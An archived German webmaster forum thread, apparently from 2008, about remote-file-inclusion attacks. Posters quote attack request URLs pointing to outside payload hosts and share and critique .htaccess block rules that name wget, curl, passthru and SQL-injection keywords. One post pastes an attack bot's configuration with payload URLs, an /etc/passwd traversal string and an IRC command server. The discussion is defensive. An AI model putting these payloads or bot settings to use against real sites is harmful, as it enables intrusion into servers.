Du befindest Dich im Archiv vom ABAKUS Online Marketing Forum. Hier kannst Du Dich für das Forum mit den aktuellen Beiträgen registrieren.

.txt???

Alles zum Thema: Robots, Spider, Logfile-Auswertung und Reports
Neues Thema Antworten
OnkelHotte
PostRank 6
PostRank 6
Beiträge: 439
Registriert: 29.06.2005, 07:05

Beitrag von OnkelHotte » 15.07.2008, 16:06

Was sind denn diesmal für Spinner unterwegs?

/foo/bar/news/stringhttp://thetestingcompany.com//cache/rotest.txt???

was soll das denn?

Anzeige von ABAKUS

von Anzeige von ABAKUS »

SEO Consulting bei ABAKUS Internet Marketing
Erfahrung seit 2002
  • persönliche Betreuung
  • individuelle Beratung
  • kompetente Umsetzung

Jetzt anfragen: 0511 / 300325-0.


Pompom
PostRank 10
PostRank 10
Beiträge: 3751
Registriert: 10.09.2004, 16:38

Beitrag von Pompom » 15.07.2008, 17:02

ist ja nun nix neues, böse hackicrackiscriptikiddi -> Ferienzeit.

OnkelHotte
PostRank 6
PostRank 6
Beiträge: 439
Registriert: 29.06.2005, 07:05

Beitrag von OnkelHotte » 16.07.2008, 08:19

Gut das ich kein contenido hab. Scheint mal wie3der irgendein Loch ungestopft zu sein.

https://emark.sk/new/vnc/test.txt??

Cash
PostRank 6
PostRank 6
Beiträge: 416
Registriert: 02.11.2005, 15:06

Beitrag von Cash » 16.07.2008, 12:17

Code-Injektion bzw. Hackversuche
mit angehängter Url lassen sich gut über die htaccess abfangen!

RewriteCond %{QUERY_STRING} http\: [OR]
RewriteCond %{QUERY_STRING} .txt?
RewriteRule ^(.*)$ - [F,L]

Der erste Eintrag
RewriteCond %{QUERY_STRING} http\: [OR]
funktioniert möglicher weise nicht bei jedem bzw. wer bestimmte Module
bei CMS einsetzt muss die Zeile entfernen!

djmarten1
PostRank 3
PostRank 3
Beiträge: 79
Registriert: 07.04.2007, 17:53

Beitrag von djmarten1 » 16.07.2008, 17:34

kann ich die 2 nachträglich in meine einfügen?
habe phpbb laufen mit den einträgen in der hta.

oder würde es da gewisse probleme geben?


RewriteCond %{QUERY_STRING} ^(.*)wget\%20 [OR]
RewriteCond %{QUERY_STRING} ^(.*)fetch\%20 [OR]
RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=\%65\%63\%68 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=echo [OR]
RewriteCond %{QUERY_STRING} ^(.*)esystem(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)passthru(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)\.printf\( [OR]
RewriteCond %{QUERY_STRING} ^(.*)cmd [OR]
RewriteCond %{QUERY_STRING} ^(.*)\%27(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)"(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)\%22(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)`(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)\%60(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)\%25(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)=http\%3A\%2F\%2F(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)=ftp://(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)=ftp\%3A\%2F\%2F(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)=https://(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)=https\%3A\%2F\%2F(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)alert\(document(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)union(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)UNION(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)SQL_INJECTION(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)phpbb_root_path=(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)configdir(.*) [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)curl(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)lynx(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)w3\%20(.*) [OR]
RewriteCond %{HTTP_COOKIE}% s:(.*):\%22test1\%22\%3b [OR]
RewriteCond %{QUERY_STRING} .*'.* [OR]
RewriteCond %{HTTP_USER_AGENT} ^lwp.* [OR,NC]
RewriteCond %{HTTP_USER_AGENT} ^Python* [NC]
RewriteRule ^.*$ https://127.0.0.1/ [R,L]

Mork vom Ork
PostRank 9
PostRank 9
Beiträge: 2557
Registriert: 08.07.2008, 11:07
Wohnort: Aufm Friedhof.

Beitrag von Mork vom Ork » 19.07.2008, 19:01

djmarten1 hat geschrieben:habe phpbb laufen mit den einträgen in der hta.

RewriteCond %{QUERY_STRING} ^(.*)wget\%20 [OR]
RewriteCond %{QUERY_STRING} ^(.*)fetch\%20 [OR]
RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=\%65\%63\%68 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=echo [OR]
RewriteCond %{QUERY_STRING} ^(.*)esystem(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)passthru(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)\.printf\( [OR]
RewriteCond %{QUERY_STRING} ^(.*)cmd [OR]
RewriteCond %{QUERY_STRING} ^(.*)\%27(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)"(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)\%22(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)`(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)\%60(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)\%25(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)=http\%3A\%2F\%2F(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)=ftp://(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)=ftp\%3A\%2F\%2F(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)=https://(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)=https\%3A\%2F\%2F(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)alert\(document(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)union(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)UNION(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)SQL_INJECTION(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)phpbb_root_path=(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)configdir(.*) [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)curl(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)lynx(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)w3\%20(.*) [OR]
RewriteCond %{HTTP_COOKIE}% s:(.*):\%22test1\%22\%3b [OR]
RewriteCond %{QUERY_STRING} .*'.* [OR]
RewriteCond %{HTTP_USER_AGENT} ^lwp.* [OR,NC]
RewriteCond %{HTTP_USER_AGENT} ^Python* [NC]
RewriteRule ^.*$ https://127.0.0.1/ [R,L]
Vielleicht solltest du eher phpbb rauswerfen. Sonderlich viel Vertrauen scheinst du ja nicht zu haben … Das sieht aus, als wenn du statt eines ordentlichen Tresors zu kaufen deinen wackeligen vorhandenen mit Ketten, Packband, Uhu, Tesafilm, Gürteln und Schnürsenkeln umwickelt hättest.

OnkelHotte
PostRank 6
PostRank 6
Beiträge: 439
Registriert: 29.06.2005, 07:05

Beitrag von OnkelHotte » 23.07.2008, 09:31

heute sind sie wieder massiv unterwegs, die Kinder!

Wenn jemand Krieg spielen will:
#################
#[Configuration]#
#################
my $response = "https://www.chilecapacita.cl/nweb_portal ... lp/nfo.txt"; # included in zip as response.txt
my $test = "https://auxano.info/webcalendar/includes/js/yrec/nfo.txt"; # included in zip as test.txt
my $printcmd = "https://www.chilecapacita.cl/nweb_portal ... p/cmdk.txt?";
my $responselfi = "/../../../../../../../../etc/passwd";
my $printcmdlfi = "/../../../../../../../../etc/passwd";
my $spread = "https://auxano.info/webcalendar/includes/js/zrec/lim.txt?";
my $nickname = "rao-x".(int(rand(9999)));
my $ident = "bl4ck";
my $sex = "triplek";
my $channel = "#psycohack";
my $server = "matrix.de.eu.dal.net";
my $port = 7000;

ole1210
PostRank 10
PostRank 10
Beiträge: 7464
Registriert: 12.08.2005, 10:40
Wohnort: Olpe

Beitrag von ole1210 » 23.07.2008, 10:18

Davon hab ich jeden Tag an die hundert Versuche. Da reg ich mich gar nicht drüber auf.

Bisher belastet das nur geringfügig den Server.

Aber ist schon lusstig, wenn auf einer völlig statischen Seite Sicherheitslücken aus irgendwelchen OS-CMS gesucht werden! :-)

djmarten1
PostRank 3
PostRank 3
Beiträge: 79
Registriert: 07.04.2007, 17:53

Beitrag von djmarten1 » 24.07.2008, 06:13

Mork vom Ork hat geschrieben:
vieleicht soltst du lieber den stecker ziehen!!
auf deinen dummen kommentar kannich gern verzichten.

Cash
PostRank 6
PostRank 6
Beiträge: 416
Registriert: 02.11.2005, 15:06

Beitrag von Cash » 04.08.2008, 00:29

ganz Unrecht hat Mork vom Ork nicht.
in deiner Liste sind überwiegend die Condition falsch
und somit erfüllen die Einträge ihren Zweck nicht
z.B.
RewriteCond %{QUERY_STRING} ^(.*)wget\%20 [OR]
wget taucht normaler weise als Useragent auf
im Query hab ich den noch nie gesehen
richtig müsste die Zeile heisen:
RewriteCond %{HTTP_USER_AGENT} wget [NC,OR]
das selbe auch bei:
RewriteCond %{QUERY_STRING} ^(.*)fetch\%20 [OR]
RewriteCond %{QUERY_STRING} ^(.*)curl(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)lynx(.*) [OR]

Antworten
  • Vergleichbare Themen
    Antworten
    Zugriffe
    Letzter Beitrag